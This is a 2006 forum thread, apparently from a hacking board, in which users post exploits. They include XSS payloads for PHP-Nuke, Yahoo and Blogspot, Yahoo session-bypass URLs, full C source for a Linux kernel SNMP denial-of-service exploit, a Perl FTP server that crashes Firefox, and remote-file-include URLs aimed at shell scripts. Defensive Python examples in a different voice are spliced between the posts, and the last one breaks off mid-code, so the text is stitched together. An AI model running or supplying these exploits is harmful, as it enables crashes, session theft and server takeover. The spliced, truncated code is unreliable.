Author Topic: Compilation of Interesting Exploits (-Updating-)  (Read 55628 times)
741852

Php-Nuke <= 7.9 [XSS] Search
« Reply #45 on: 10 June 2006, 15:20 »

In the php-nuke search page (search.php) you enter:

Code:
"><body onload="alert(document.cookie)

And an alert pops up with your cookie.

It may also work on earlier versions.

Credits:
O.G.

since 1992 there's a club which is making history, seven years later in 1999 it's still kicking!, PONT AERI!
..... and in 2008 IT'S STILL KICKING !!!
pont aeri forever
hardcore for life [H4L]

Syn_ack

Bug Yahoo Messenger 7.0/7.5
« Reply #46 on: 17 June 2006, 07:01 »

This simple code will cause a C++ runtime error in Messenger if it is placed in a private message: "msg:---------------------------------------------iframe onload=$InlineAction()>:)" (without the quotes). It is possible to crash a remote Messenger by sending a file whose name is this code. There is no need to accept the file!
ObliT

News: Flaw in Microsoft Excel exploited by zero-day exploit
« Reply #47 on: 18 June 2006, 20:49 »

This is an exploit that appeared before any fixes were available for this vulnerability found in Microsoft Excel. The exploit is able to abuse the flaw to run TrojanDownloader.Small.CAK and Spy.Flux, as identified by NOD32, on the system where the malicious spreadsheet has been opened. The .XLS file may arrive attached to spam emails or be downloaded from various sites.

Source: http://spyware-war.mp3.es/bugs-errores/falla-en-microsoft-excel-es-aprovechada-por-exploit-dia-cero-2.html
Jimmy_Neutron

Yahoo Multiple Vulnerabilities
« Reply #48 on: 25 June 2006, 00:15 »

Attack!!!

Code:
Yahoo Multiple vulnerabilities (Authentication Bypass, Session Binding,
Cookie Encoding Security Weakness, Cross-Site Scripting and URL Redirection)

############################################################################
#
#       XDisclose Advisory      : XD100001
#       Advisory Released       : 20th June 06
#       Credit                  : Rajesh Sethumadhavan
#
#       Class                   : Authentication Bypass
#                                 Session Binding Vulnerability
#                                 Cookies Encoding Security Weakness
#                                 Cross-Site Scripting
#                                 URL redirection
#       Severity                : Medium
#       Solution Status         : Unpatched
#       Vendor                  : Yahoo
#       Affected applications   : Yahoo multiple web-based services
#
############################################################################


Overview:
Yahoo! Inc. is an American computer services company with a mission to "be
the most essential global Internet service for consumers and businesses". It
operates an Internet portal, including the popular Yahoo! Mail. According to
Web trends Yahoo! is the most visited website on the Internet today with more
than 400 million unique users. The global network of Yahoo! websites received
3.4 billion page views per day on average as of October 2005.

Various Yahoo! services are vulnerable to authentication bypass, session
binding, weak cookie encoding, cross-site scripting, file inclusion and URL
redirection vulnerabilities, which are caused by improper validation of
user-supplied inputs.

Description:
Multiple vulnerabilities exist in various Yahoo services.


1. Authentication Bypass and Session Binding Vulnerability.
   A malicious user can log on to Yahoo without submitting the username
   and password by constructing a malicious URL using cookies.

   The same session (URL) can be used to log in multiple times from multiple IP
   addresses, leading to a session binding vulnerability.

   POC:
   --------------------------------------------------------------------------
   http://msg.edit.yahoo.com/config/res...=0kvgvgv3qlf11
   %26l=i42.j4ij/o&.t=T=sk=DAAXxtibJfco8U%26d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0
   BYQFRQUUBdGlwAVNQZHhvQgF6egFYazdsRUJnV0E-&.done=http%3a//mail.yahoo.com
   --------------------------------------------------------------------------
   http://msg.edit.yahoo.com/config/res...=0kvgvgv3qlf11
   %26l=i42.j4ij/o%26p=m2gvvind12000700&.t=T=sk=DAAXxtibJfco8U%26d=c2wBTlRVMU
   FUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFYazdsRUJnV0E-&.done=http
   %3a//mail.yahoo.com
   --------------------------------------------------------------------------

   Where in "sk" & "d" is session

   Screenshot:
   http://www.xdisclose.bravehost.com/Images/Yahoo! Auth Bypass.png



2. Cookie Encoding Security Weakness
   The implementation of cookies in Yahoo is so weak that they can be decoded
   easily. A malicious attacker can easily collect a lot of personal information
   from cookies, like year of birth, zipcode, country and name, which can be
   used to get the password via "yahoo forgot password".

   Where in
   sk & d is session
   n is password
   l is username
   p is country, year of birth, gender and more
   b is cookies created
   lg is language
   intl is international language
   iz is zipcode
   jb is Industry and title

   POC Screenshot:
   http://www.xdisclose.bravehost.com/Images/Yahoo Cookie Encoding.png

3. Cross-Site Scripting.
   This vulnerability results from the failure of the Yahoo! filtering engine
   to block certain user-supplied inputs.

   a) Yahoo Calendar Service XSS
        The flaws are due to improper sanitization of inputs passed to
        "Location", "Address", "Street" and "Phone".

        ========================================================================
        This event repeats every day.
        </font><br>
        <font face="Arial" size=-1>
        <b>Event Location</b>: <script>alert('Location')</script>
        <br><b>Street</b>: <script>alert('Address')</script>
        <br><b>City, State, Zip</b>: <script>alert('Street')</script>
        <br><b>Phone</b>: <script>alert('Phone')</script>
        </font><br>
        ========================================================================

        Screenshot:
        http://www.xdisclose.bravehost.com/Images/XSS Calendar location.png
        http://www.xdisclose.bravehost.com/Images/XSS Calendar Address.png
        http://www.xdisclose.bravehost.com/Images/XSS Calendar Street.png
        http://www.xdisclose.bravehost.com/Images/XSS Calendar Phone.png


   b) Yahoo Options Mail Account XSS
        The flaws are due to improper sanitization of inputs passed to "Name"
        and "Reply to" parameters.


        ========================================================================
        <tr valign="top">
        <td>Name:</td>
        <td><script>alert('Name')</script></td>
        </tr>

        <tr valign="top">
        <td>Email:</td>
        <td>sec.test@yahoo.com</td>
        </tr>
        <tr valign="top">
        <td>Reply-To:</td>
        <td><script>alert('Reply')</script>@yah.com</td>
        </tr>
        ========================================================================

        Screenshot:
        http://www.xdisclose.bravehost.com/Images/XSS Mail Account Reply.png
        http://www.xdisclose.bravehost.com/Images/XSS Mail Account Name.png


   c) Yahoo Options Filter XSS.
        The flaws are due to improper sanitization of inputs passed to "From"
        and "To" parameters

        ========================================================================
        <b>From</b>     contains
        "<b><script>alert('From')</script>@yahoo.com</b>"
        <br>
        <b>To/CC</b> contains
        "<b><script>alert('To')</script>@yahoo.com</b>"
        <br>
        ========================================================================

        Screenshot:
        http://www.xdisclose.bravehost.com/Images/Xss Filter From.png
        http://www.xdisclose.bravehost.com/Images/Xss Filter To.png


   d) Yahoo Ads flash file XSS.
        The flaws are due to improper sanitization of inputs passed to flash Ads
        files

        Exploit:
        -----------------------------------------------------------------------
        http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
        20060330_68006_asker1_sound.swf?clickTAG=javascript:alert('XSS%20
        Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')

        http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/
        20060330_68006_1_425x600_monster_morph_asker_1_check.swf?clickTAG=
        javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20
        Rajesh')

        http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
        042406_68946_v1_728x90_super_nup_fun.swf?clickTAG=javascript:alert('XSS
        %20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')

        http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
        042406_68946_v1_425x600_mon_nup_mplace.swf?clickTAG=javascript:alert
        ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')

        http://ad.ie.doubleclick.net/812666/...o_300x250.swf?
        clickTAG=javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20
        By%20Rajesh')

        http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/
        042406_68946_v1_728x90_super_nup_sit.swf?clickTAG=javascript:alert
        ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')

        http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_messenger/
        20051028_61760_2_425x600_mon_scarehim.swf?clickTAG=javascript:alert
        ('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')

        http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_mail/
        20060512_65459_1_360x100_mwa1_mail_accolades.swf?clickTAG=javascript:
        alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')

        and more
        -----------------------------------------------------------------------

        Screenshot:
        http://www.xdisclose.bravehost.com/Images/XSS Flash Ads.png


   e) Yahoo Mail Beta HTTP Header XSS
        The flaws are due to improper sanitization of inputs passed to all HTTP
        header like Accept, Accept-Charset, Accept-Language, Cache-Control,
        Connection, Content-Length, Content-Type, Cookie, Keep-Alive, Pragma,
        SOAPAction and User-Agent in Yahoo Mail Beta.

        POC :
        ========================================================================
        GET : http://uk.f555.mail.yahoo.com/ymws?m...id=CKyO7/zcUU2

        Host: uk.f555.mail.yahoo.com
        User-Agent: <script>alert('User-Agent:')</script>
        Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,
        text/plain;q=0.8,image/png,*/*;q=0.5;<script>alert('Accept:')</script>
        Accept-Language: en-us,en;q=0.5;<script>alert('Accept-Language:')</script>
        Accept-Encoding: gzip,deflate;<script>alert('Accept-Encoding:')</script>
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;<script>alert
        ('Accept-Charset:')</script>
        Keep-Alive: 300;<script>alert('Keep-Alive:')</script>
        Connection: keep-alive;<script>alert('Connection:')</script>
        SOAPAction: urn:yahoo:ymws#ListFolders;<script>alert('SOAPAction:')
        </script>
        Content-Length: <script>alert('Content-Length:')</script>
        Content-Type: application/xml;<script>alert('Content-Type:')</script>
        Cookie: B=dcnl4j129c7tu&b=3&s=j3;
        F=a=aNqy1CosvW3BmaGno6BSLOpXkP2PCglCZ3_LDJtts8oaitnkGkgOOjxwPKS6&b=bIpq;
        Y=v=1&n=0kvgvgv3qlf11&l=i42.j4ij/o&p=m2gvvind12000700&jb=19|24|&iz=123456
        r=g4&lg=uk&intl=uk&np=1;PH=fn=eIhKKoq4dTG7Gjr4FtHqCTA-;
        T=z=W/hlEBWF3lEBrRcLnJGLZKoMjIyBjUyNjU2NE9OMzI-&a=QAE&sk=DAAZ7oQuYalSuV&
        d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFXL2hsRUJnV0
        E-;
        U=mt=7lM5FJ2MhYo0WJ.pqDZdpFIY1pCQZRq2Q6ftdw--&ux=W/hlEB&un=0kvgvgv3qlf11;
        YM.dpref1=sec.test%3Aspp%257C1;<script>alert('Cookie:')</script>
        Pragma: no-cache;<script>alert('Pragma:')</script>
        Cache-Control: no-cache;<script>alert('Cache-Control:')</script>
        ========================================================================

        Screenshot:
        http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept.png
        http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept-Charset.png
        http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept-Language.png
        http://www.xdisclose.bravehost.com/Images/XSS MailBeta Cache-Control.png
        http://www.xdisclose.bravehost.com/Images/XSS MailBeta Connection.png
        http://www.xdisclose.bravehost.com/Images/XSS MailBeta Content-Length.png
        http://www.xdisclose.bravehost.com/Images/XSS MailBeta Content-Type.png
        http://www.xdisclose.bravehost.com/Images/XSS MailBeta Cookie.png
        http://www.xdisclose.bravehost.com/Images/XSS MailBeta Keep-Alive.png
        http://www.xdisclose.bravehost.com/Images/XSS MailBeta Pragma.png
        http://www.xdisclose.bravehost.com/Images/XSS MailBeta SoapAction.png
        http://www.xdisclose.bravehost.com/Images/XSS MailBeta User-Agent.png


        Impact:
        Successful exploitation allows execution of arbitrary script code
        in a user's browser session in the context of an affected site, which may
        allow stealing of cookie-based authentication credentials.

4. URL redirection.
   This is due to a failure to filter incoming untrusted data before the
   content reaches users. This can be exploited for phishing attacks. The
   vulnerable parameters are yahoo search web, image, video, preferences, cache,
   yahoo answers and more urls containing /*http://yahoo.com or /**http://
   yahoo.com

   Exploit:
   ---------------------------------------------------------------------------
   http://rds.yahoo.com/_ylt=Ah0geusyaM...11do5qdq6/EXP=
   1148028186/**http%3a//www.xdisclose.com

   http://search.yahoo.com/preferences/...ces?pref_done=
   http%3a//www.xdisclose.com
   ---------------------------------------------------------------------------

   Screenshot:
   http://www.xdisclose.bravehost.com/Images/URL Redirection WebSearch.png
   http://www.xdisclose.bravehost.com/Images/URL Redirection Images.png
   http://www.xdisclose.bravehost.com/Images/URL Redirection Video.png

5) Interesting facts about Yahoo
   Yahoo Mail Inbox shows wrong unread messages count if it is above 65535
   unread messages.

   Screenshot:
   http://www.xdisclose.bravehost.com/Images/Yahoo Inbox.png

Original Advisory:
http://www.xdisclose.com/XD100001.txt

Credits:
Rajesh Sethumadhavan has been credited with the discovery of this vulnerability


Disclaimer:
This entire document is strictly for educational, testing and demonstrating
purpose only. Modification use and/or publishing this information is entirely on
your own risk. The exploit code is to be used on your own email account. I am
not liable for any direct or indirect damages caused as a result of using the
information or demonstrations provided in any part of this advisory.

jimmy.
Jimmy_Neutron

Linux Kernel < 2.6.16.18 Remote DoS Exploit
« Reply #49 on: 25 June 2006, 00:21 »

Just do it

Code:
/*
 *  ecl-nf-snmpwn.c - 30/05/06
 *
 *  Alex Behar <alex@ecl-labs.org>
 *  Yuri Gushin <yuri@ecl-labs.org>
 *
 *  A patch review we did on the 2.6.16.17->18 Linux kernel source tree revealed
 * a restructuring of code in the snmp_parse_mangle() and the snmp_trap_decode()
 * functions. After further research it turned out to be a vulnerability
 * previously reported[1] and assigned with CVE-2006-2444. For more details,
 * see the version change log.
 *
 * 1) http://kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.16.18
 *
 * --
 * Greets fly out to the ECL crew - Valentin Slavov, Dimityr Manevski.
 * To stranger, shrink, the Console Pimps crew (blexim, ex0, hugin, w00f, matt,
 * kyu, kbd and the rest), our favorite soldier boy Sagi Horev, the SigMIL crew,
 * izik, tanin00, and everyone else we left out.
 *
 * P.S. - blexim, how are your FACECRABS ???? :))))
 *
 */

#ifndef _BSD_SOURCE
#define _BSD_SOURCE
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <libnet.h>

void banner();
void usage(char *);

/* SNMPv1 message: SEQUENCE { INTEGER 0, OCTET STRING "ECL", Trap-PDU of length 0 } */
char pwnage[] = "\x30\x0a\x02\x01\x00\x04\x03\x45\x43\x4c\xa4\x00";

int main(int argc, char **argv)
{
    char errbuf[LIBNET_ERRBUF_SIZE];
    libnet_t *l;
    int c;
    u_char *buf;
    int packet_len = 0;
    struct ip *IP;
    struct udphdr *UDP;
    u_int32_t src = 0, dst = 0;

    banner();

    if (argc < 3)
        usage(argv[0]);

    if ((l = libnet_init(LIBNET_RAW4, NULL, errbuf)) == NULL) {
        fprintf(stderr, "[!] libnet_init() failed: %s", errbuf);
        exit(-1);
    }

    if ((src = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE)) == -1) {
        fprintf(stderr, "[!] Unresolved source address.\n");
        exit(-1);
    }
    if ((dst = libnet_name2addr4(l, argv[2], LIBNET_RESOLVE)) == -1) {
        fprintf(stderr, "[!] Unresolved destination address.\n");
        exit(-1);
    }

    if ((buf = malloc(IP_MAXPACKET)) == NULL) {
        perror("malloc");
        exit(-1);
    }

    UDP = (struct udphdr *)(buf + LIBNET_IPV4_H);

    packet_len = LIBNET_IPV4_H + LIBNET_UDP_H + sizeof(pwnage) - 1;

    srand(time(NULL));
    IP = (struct ip *) buf;
    IP->ip_v    = 4;                   /* version 4 */
    IP->ip_hl   = 5;                   /* header length */
    IP->ip_tos  = 0;                   /* IP tos */
    IP->ip_len  = htons(packet_len);   /* total length */
    IP->ip_id   = rand();              /* IP ID */
    IP->ip_off  = htons(0);            /* fragmentation flags */
    IP->ip_ttl  = 64;                  /* time to live */
    IP->ip_p    = IPPROTO_UDP;         /* transport protocol */
    IP->ip_sum  = 0;
    IP->ip_src.s_addr = src;
    IP->ip_dst.s_addr = dst;

    UDP->uh_sport = rand();
    UDP->uh_dport = (argc > 3) ? htons((u_short)atoi(argv[3])) : htons(161);
    UDP->uh_ulen = htons(LIBNET_UDP_H + sizeof(pwnage) - 1);
    UDP->uh_sum = 0;

    memcpy(buf + LIBNET_IPV4_H + LIBNET_UDP_H, pwnage, sizeof(pwnage) - 1);

    libnet_do_checksum(l, (u_int8_t *)buf, IPPROTO_UDP, packet_len - LIBNET_IPV4_H);

    if ((c = libnet_write_raw_ipv4(l, buf, packet_len)) == -1) {
        fprintf(stderr, "[!] Write error: %s\n", libnet_geterror(l));
        exit(-1);
    }

    printf("[+] Packet sent.\n");

    libnet_destroy(l);
    free(buf);
    return (0);
}

void usage(char *cmd)
{
    printf("[!] Usage: %s <source> <destination> [port]\n", cmd);
    exit(-1);
}

void banner()
{
    printf("\t\tNetfilter NAT SNMP module DoS exploit\n"
           "\t\t   Yuri Gushin <yuri@ecl-labs.org>\n"
           "\t\t    Alex Behar <alex@ecl-labs.org>\n"
           "\t\t\t       ECL Team\n\n\n");
}

//jimmy
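The 12 bytes in `pwnage[]` are a syntactically complete SNMPv1 message whose Trap-PDU (tag 0xa4) has length zero, so the whole problem is how a decoder behaves when a PDU carries none of its required fields. The parser below is an added Python example, not code from the exploit or from the kernel's NAT helper: it decodes the same bytes with an explicit bounds check on every length, refuses a Trap-PDU that does not carry its six mandatory fields, and never trusts a length field before checking it against the buffer, which is the check a protocol helper or an IDS preprocessor needs before it allocates or frees anything. `WELLFORMED_TRAP` is a constructed, valid trap for comparison.

```python
# Strict SNMPv1 BER decoding with explicit bounds checks (added example).

# The 12 bytes sent by the exploit above:
# SEQUENCE { INTEGER 0, OCTET STRING "ECL", [4] Trap-PDU of length 0 }
ECL_PACKET = bytes.fromhex("300a020100040345434ca400")

# Constructed, well-formed Trap-PDU for comparison: enterprise 1.3.6.1.4.1,
# agent-addr 10.0.0.1, generic-trap 6, specific-trap 0, time-stamp 0, empty varbinds.
WELLFORMED_TRAP = bytes.fromhex(
    "3022" "020100" "040345434c"
    "a418" "06052b06010401" "40040a000001" "020106" "020100" "430100" "3000"
)


def read_tlv(buf: bytes, pos: int):
    """Decode one BER tag-length-value at pos; raise ValueError on anything out of bounds."""
    if pos >= len(buf):
        raise ValueError("truncated: no tag at offset %d" % pos)
    tag = buf[pos]
    pos += 1
    if tag & 0x1F == 0x1F:
        raise ValueError("multi-byte tag not allowed in SNMP")
    if pos >= len(buf):
        raise ValueError("truncated: no length byte")
    first = buf[pos]
    pos += 1
    if first < 0x80:
        length = first
    else:
        n = first & 0x7F
        if n == 0 or n > 4:
            raise ValueError("indefinite or oversized length")
        if pos + n > len(buf):
            raise ValueError("truncated: long-form length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
        if length < 0x80:
            raise ValueError("non-minimal length encoding")
    if pos + length > len(buf):
        raise ValueError("length %d exceeds buffer" % length)
    return tag, buf[pos:pos + length], pos + length


def parse_snmpv1_message(pkt: bytes) -> dict:
    """Parse an SNMPv1 message and validate a Trap-PDU's field count before any use of it."""
    tag, body, end = read_tlv(pkt, 0)
    if tag != 0x30:
        raise ValueError("message is not a SEQUENCE")
    if end != len(pkt):
        raise ValueError("trailing bytes after message")
    tag, version, pos = read_tlv(body, 0)
    if tag != 0x02 or version != b"\x00":
        raise ValueError("not an SNMPv1 message")
    tag, community, pos = read_tlv(body, pos)
    if tag != 0x04:
        raise ValueError("community is not an OCTET STRING")
    tag, pdu, pos = read_tlv(body, pos)
    if pos != len(body):
        raise ValueError("trailing bytes after PDU")
    if tag & 0xE0 != 0xA0:
        raise ValueError("PDU tag is not context-specific constructed")
    pdu_type = tag & 0x1F
    fields = []
    pos = 0
    while pos < len(pdu):
        t, v, pos = read_tlv(pdu, pos)
        fields.append((t, v))
    # Trap-PDU: enterprise, agent-addr, generic-trap, specific-trap, time-stamp, varbinds
    if pdu_type == 4 and len(fields) != 6:
        raise ValueError("Trap-PDU has %d fields, expected 6" % len(fields))
    return {"version": 0, "community": community.decode("ascii", "replace"),
            "pdu_type": pdu_type, "fields": len(fields)}


def classify(pkt: bytes) -> str:
    """'ok' for a message that passes every check, otherwise the reason it was rejected."""
    try:
        parse_snmpv1_message(pkt)
        return "ok"
    except ValueError as err:
        return str(err)


if __name__ == "__main__":
    print("exploit packet :", classify(ECL_PACKET))
    print("well-formed    :", classify(WELLFORMED_TRAP))
    print("truncated      :", classify(ECL_PACKET[:-1]))
```

The same `read_tlv` serves every nested level, so a length that points past the enclosing value is caught at the level where it appears rather than after a copy has already been made.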
Jimmy_Neutron

IdeaBox <= 1.1 (gorumDir) Remote File Include Vulnerability
« Reply #50 on: 25 June 2006, 15:48 »

Hi.  :rolleyes:

Code:
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
$$
$$  IdeaBox <= 1.1 (gorumDir) Remote File Include Vulnerability
$$  script site: http://ideabox.phpoutsourcing.com/
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$              Find by: Kacper (a.k.a Rahim)
$$
$$ Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$
$$  Greetz: DragonHeart, Satan, Leito, Leon, Luzak,
$$           Adam, DeathSpeed, Drzewko, pepi
$$
$$  Specjal greetz: DragonHeart ;-)
$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
/*
19 June 2006. I'm disappearing for a month, going on vacation :-)
---------------------------------------------------------------
19 June 2006, going on vacation !!!! I'll be back in a month, Cya ;-)
*/


#include.php:
/*
include("$gorumDir/generformlib_date.php");
include("$gorumDir/notification.php");
include("$gorumDir/zmail.php");
include("$ideaDir/user.php");
include("$ideaDir/globalsettings.php");
include("$ideaDir/init.php");
include("$ideaDir/idea.php");
include("$ideaDir/history.php");
include("$ideaDir/cord.php");
*/


#Expl:


http://www.site.com/[IdeaBox_path]/include.php?gorumDir=[evil_scripts]


#Greetings to everyone ;-)

//jimmy

# milw0rm.com [2006-06-19]
sni-labs

New VULn IN WIN
« Reply #51 on: 06 July 2006, 02:58 »

MixTroN

Mozilla Firefox FTP Request Remote DoS exploit
« Reply #52 on: 27 August 2006, 16:18 »


Vulnerability in:

Mozilla Firefox version 1.5.0.6 and earlier

Exploit:

#!/usr/bin/perl
#author: tomas kempinsky

use strict;
use Socket;

my $port = shift || 2121;
my $proto = getprotobyname('tcp');
# FTP reply sequence "220 Z", "331 Z", "500 DoS", "500 Z" sent to every client
my $payload =
"\x32\x32\x30\x20\x5a\x0d\x0a\x33".
"\x33\x31\x20\x5a\x0d\x0a\x35\x30".
"\x30\x20\x44\x6f\x53\x0d\x0a\x35".
"\x30\x30\x20\x5a\x0d\x0a";

socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, 1) or die "setsock: $!";

my $paddr = sockaddr_in($port, INADDR_ANY);

bind(SERVER, $paddr) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
print "ftp://D:oS@\x0localhost:2121/\n";

my $client_addr;
while ($client_addr = accept(CLIENT, SERVER)) {
    # find out who connected
    my ($client_port, $client_ip) = sockaddr_in($client_addr);
    my $client_ipnum = inet_ntoa($client_ip);
    my $client_host = gethostbyaddr($client_ip, AF_INET);
    print ": $client_host", "[$client_ipnum]\n";
    # send them a message, close connection
    print CLIENT $payload;
    close CLIENT;
}

parisnet

IE 6 (vml) 0day Compiled - Remote Execute
« Reply #53 on: 25 September 2006, 21:27 »


III_index_III

Re: <-> Compilation of Interesting Exploits (-Updating-)
« Reply #54 on: 25 October 2006, 19:45 »

this isn't an exploit but be careful with this html bug, it can be very dangerous once uploaded to an ftp



<h2> Texto anterior al script</h2>
<script type="text/jscript">
function init() {
document.write("The time is now: " + Date() );
}
window.onload = init;
</script>
<h2>Texto posterior al script</h2>

post any questions or comments
zickox

Re: <-> Compilation of Interesting Exploits (-Updating-)
« Reply #55 on: 25 October 2006, 20:05 »

this isn't an exploit but be careful with this html bug, it can be very dangerous once uploaded to an ftp



<h2> Texto anterior al script</h2>
<script type="text/jscript">
function init() {
document.write("The time is now: " + Date() );
}
window.onload = init;
</script>
<h2>Texto posterior al script</h2>

post any questions or comments

I tried it in iexplore and in firefox and nothing happened, but I think I've seen that code before, well... here's my advisory  :P
Code:
###############################################################################################################

     Minichat v6 Remote File Include
###############################################################################################################

Affected Software .: Minichat v6
Class................... : Remote File Inclusion
Found by.............: Zickox
Contact. ...............: los_misfits[at]hotmail.com

###############################################################################################################
Download Software:

http://www.linkini.net/phpscripts/descargas/Tagboards%20(12%20Archivos)/Minichat%20v6.0%20-%20Con%20instalador.zip

###############################################################################################################
Affected File:

ftag.php

###############################################################################################################

Vulnerable code:

<? include($_GET['mostrar']); ?>


###############################################################################################################


Exploit:

http://www.victim.com/path/ftag.php?mostrar=shell.txt?

###############################################################################################################

Special GreetingS: NETTOXIC | Txis | The Shredder | erboot | trty | jasus | Cvir.System | ZeroHack Team

# milw0rm.com [2006-10-11]

link: http://www.milw0rm.com/exploits/2519

cheers
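The IdeaBox `gorumDir=` bug in reply #50 and the Minichat `mostrar=` bug in reply #55 are the same defect: a request parameter flows into `include()` unchanged, so a URL or a traversal string decides which file gets executed. The Python below is an added example and is not code from either script or advisory; `INCLUDE_DIR`, the `tagboard.php` entry in `ALLOWED_INCLUDES` and the `LOG_LINES` are constructed (the other three include names are taken from the IdeaBox listing above). It shows the fix, where the request may only pick a name from a fixed allowlist and never a directory or a path, and reuses the same check to flag the two exploit URLs in sample access-log lines.

```python
import re
from pathlib import PurePosixPath
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed placeholder for the application's real include directory.
INCLUDE_DIR = PurePosixPath("/srv/app/include")
# Names the application may include. The first three appear in the IdeaBox
# include.php listing; tagboard.php is constructed for the Minichat case.
ALLOWED_INCLUDES = {"generformlib_date.php", "notification.php", "zmail.php", "tagboard.php"}
NAME_RE = re.compile(r"[a-z0-9_]+\.php")                 # bare lowercase file name only
SCHEME_RE = re.compile(r"[a-z][a-z0-9+.\-]*:", re.IGNORECASE)


def resolve_include(user_value: str):
    """Map a request-supplied name to a file under INCLUDE_DIR, or return (None, reason)."""
    value = unquote(user_value)
    if SCHEME_RE.match(value) or value.startswith(("//", "\\\\")):
        return None, "remote url"                    # http://, ftp://, php://, data:, \\host\share
    if not NAME_RE.fullmatch(value):
        return None, "name outside allowed pattern"  # ../, /etc/passwd, shell.txt?, NUL bytes
    if value not in ALLOWED_INCLUDES:
        return None, "not in allowlist"
    return INCLUDE_DIR / value, "ok"


# Constructed access-log lines: the two exploit shapes from the posts plus a legitimate request.
LOG_LINES = [
    '10.0.0.5 - - [19/Jun/2006:10:00:01 +0000] "GET /ideabox/include.php?gorumDir=http://evil.example/shell.txt%3F HTTP/1.1" 200 512',
    '10.0.0.6 - - [11/Oct/2006:12:30:00 +0000] "GET /minichat/ftag.php?mostrar=shell.txt? HTTP/1.1" 200 77',
    '10.0.0.7 - - [11/Oct/2006:12:31:00 +0000] "GET /minichat/ftag.php?mostrar=tagboard.php HTTP/1.1" 200 2048',
]
INCLUDE_PARAMS = {"gorumDir", "mostrar"}   # the parameter names from the two advisories


def suspicious_includes(lines, params=INCLUDE_PARAMS):
    """Return (param, value, reason) for every include parameter that fails resolve_include."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+)', line)
        if not m:
            continue
        for key, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
            if key in params:
                path, reason = resolve_include(value)
                if path is None:
                    hits.append((key, value, reason))
    return hits


if __name__ == "__main__":
    for hit in suspicious_includes(LOG_LINES):
        print("suspicious include:", hit)
```

The allowlist is the real control; the scheme and pattern checks exist only to give a precise reason in logs and alerts. Nothing here tries to sanitize the value into something includable, because a value that needs sanitizing is already a request the application should refuse.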
sirdarckcat
Re: <-> Compilation of Interesting Exploits (-Updating-)
« Reply #56 on: 28 October 2006, 20:09 »

Cross Site Scripting In Blogspot.es By Firewall

Cross Site Scripting in Comments
<script>alert(document.cookie)</script>
And /or  <h1>ow3nd</h1>
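The PHP-Nuke search box in reply #45, the Yahoo calendar, mail-options and HTTP-header injections in reply #48 and the Blogspot comment field above all come down to one missing step: HTML-encoding user input before it is written back into the page. This Python example is added here and is not code from the thread or from any of the affected products; the two templates, the `{{input}}` placeholder and the payload strings are constructed to mirror the posts. It renders the same inputs through a vulnerable and a hardened template and then parses the result the way a browser would, to show that only the unescaped output gains extra tags or event handlers.

```python
import html
from html.parser import HTMLParser

# Constructed templates standing in for a search form and a comment box.
# "{{input}}" marks where the user-controlled value is reflected.
SEARCH_BOX = '<form><input type="text" name="query" value="{{input}}"></form>'
COMMENT = '<div class="comment">{{input}}</div>'

# Constructed inputs of the shape quoted in the posts above.
ATTR_BREAKOUT = '"><body onload="alert(document.cookie)'   # closes value="...", adds a handler
SCRIPT_TAG = "<script>alert(document.cookie)</script>"      # comment / header reflection


def render_vulnerable(template: str, user_input: str) -> str:
    """Reflects the raw value, which is what the reported pages did."""
    return template.replace("{{input}}", user_input)


def render_hardened(template: str, user_input: str) -> str:
    """HTML-encodes the value so it is inert in text and in quoted-attribute context."""
    return template.replace("{{input}}", html.escape(user_input, quote=True))


class TagAudit(HTMLParser):
    """Records every start tag and every on* attribute the parser encounters."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def audit(markup: str):
    parser = TagAudit()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.handlers


def injected(template: str, rendered: str) -> bool:
    """True when the rendered page has tags or handlers that the template alone does not."""
    baseline = audit(template.replace("{{input}}", ""))
    return audit(rendered) != baseline


if __name__ == "__main__":
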